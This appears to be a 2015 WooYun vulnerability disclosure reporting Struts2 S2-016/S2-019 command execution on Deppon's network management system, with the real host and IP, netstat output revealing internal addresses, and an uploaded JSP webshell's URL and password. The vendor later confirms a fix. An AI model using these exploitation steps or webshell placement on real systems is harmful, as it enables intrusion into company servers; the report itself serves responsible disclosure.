当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0114897

漏洞标题:德邦某智能网管系统存在命令执行漏洞

相关厂商:deppon.com

漏洞作者: 茜茜公主

提交时间:2015-05-19 11:19

修复时间:2015-05-25 14:01

公开时间:2015-05-25 14:01

漏洞类型:系统/服务补丁不及时

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-19: 细节已通知厂商并且等待厂商处理中
2015-05-20: 厂商已经确认,细节仅向厂商公开
2015-05-25: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

st2命令执行

详细说明:

分支机构智能网管系统
http://snms.deppon.com:8080/itms/index.login.action

QQ截图20150519093335.jpg


Target: http://180.153.16.29:8080/itms/index.login.action
Useage: S2-016
Whoami: admin
WebPath: /deppon/server/default/./deploy/acs.ear/itms.war/
====================================================================================================================================
Target: http://180.153.16.29:8080/itms/index.login.action
Useage: S2-019
Whoami: admin
WebPath: /deppon/server/default/./deploy/acs.ear/itms.war/
====================================================================================================================================


漏洞证明:

QQ截图20150519093423.jpg


★K8cmd-> netstat -an
====================================================================================================================================
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:43205 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:37834 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:1098 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:1099 0.0.0.0:* LISTEN
tcp 0 0 192.168.3.7:3181 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8083 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:52025 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:6010 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:6011 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:4444 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:8093 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:4445 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:4446 0.0.0.0:* LISTEN
tcp 0 0 127.0.0.1:3873 0.0.0.0:* LISTEN
tcp 0 0 192.168.3.7:8080 192.168.255.1:54442 TIME_WAIT
tcp 0 0 192.168.3.7:8080 192.168.255.1:34117 TIME_WAIT
tcp 0 0 192.168.3.7:8080 192.168.255.1:43844 ESTABLISHED
tcp 0 0 192.168.3.7:8080 192.168.255.1:1958 TIME_WAIT
tcp 0 0 192.168.3.7:8080 10.251.254.38:25432 TIME_WAIT
tcp 0 0 192.168.3.7:8080 192.168.255.1:58830 TIME_WAIT
tcp 0 0 192.168.3.7:57852 10.253.2.203:1828 ESTABLISHED
tcp 0 0 192.168.3.7:8080 192.168.255.1:1920 TIME_WAIT
tcp 0 0 192.168.3.7:8080 192.168.255.1:45312 TIME_WAIT
tcp 0 0 192.168.3.7:8080 192.168.255.1:27912 TIME_WAIT
tcp 0 0 192.168.3.7:56112 192.168.2.112:3306 ESTABLISHED
tcp 0 0 192.168.3.7:8080 10.251.254.38:42292 TIME_WAIT
tcp 0 0 192.168.3.7:8080 10.251.254.38:47143 ESTABLISHED
tcp 0 0 192.168.3.7:56091 192.168.2.112:3306 ESTABLISHED
tcp 0 0 192.168.3.7:8080 192.168.255.1:56081 TIME_WAIT
tcp 0 0 192.168.3.7:8080 192.168.255.1:53440 TIME_WAIT
tcp 0 0 192.168.3.7:8080 192.168.255.1:59581 ESTABLISHED
tcp 0 0 192.168.3.7:8080 192.168.255.1:35874 TIME_WAIT
tcp 0 0 192.168.3.7:8080 192.168.255.1:1956 TIME_WAIT
tcp 0 0 192.168.3.7:8080 10.251.254.38:36592 TIME_WAIT
tcp 0 0 192.168.3.7:8080 10.251.254.38:49176 TIME_WAIT
tcp 0 0 192.168.3.7:56053 192.168.2.112:3306 ESTABLISHED
tcp 0 0 192.168.3.7:8080 10.251.254.38:34121 TIME_WAIT
tcp 0 0 192.168.3.7:8080 192.168.255.1:39499 ESTABLISHED
tcp 0 0 192.168.3.7:56096 192.168.2.112:3306 ESTABLISHED
tcp 0 0 192.168.3.7:8080


QQ截图20150519093530.jpg


在根目录下上传jsp访问会跳转到登录页面,我们可以利用jboss
上传到这个文件夹里jbossmq-httpil
小马:http://180.153.16.29:8080/jbossmq-httpil/one.jsp

QQ截图20150519094322.jpg


QQ截图20150519094430.jpg


ip对应的系统是http://snms.deppon.com:8080/jbossmq-httpil/wooyun.jsp
或http://180.153.16.29:8080/jbossmq-httpil/wooyun.jsp
密码woo0yun

QQ截图20150519094553.jpg


QQ截图20150519094718.jpg

修复方案:

补丁

版权声明:转载请注明来源 茜茜公主@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-20 15:26

厂商回复:

您好,感谢您对德邦安全的关注以及您对问题的反馈。我们已着手处理该问题。

最新状态:

2015-05-25:感谢您的帮助,我们已经关闭风险接口,并将在后期的版本更新中对安全问题进行审查。谢谢


漏洞评价:

评论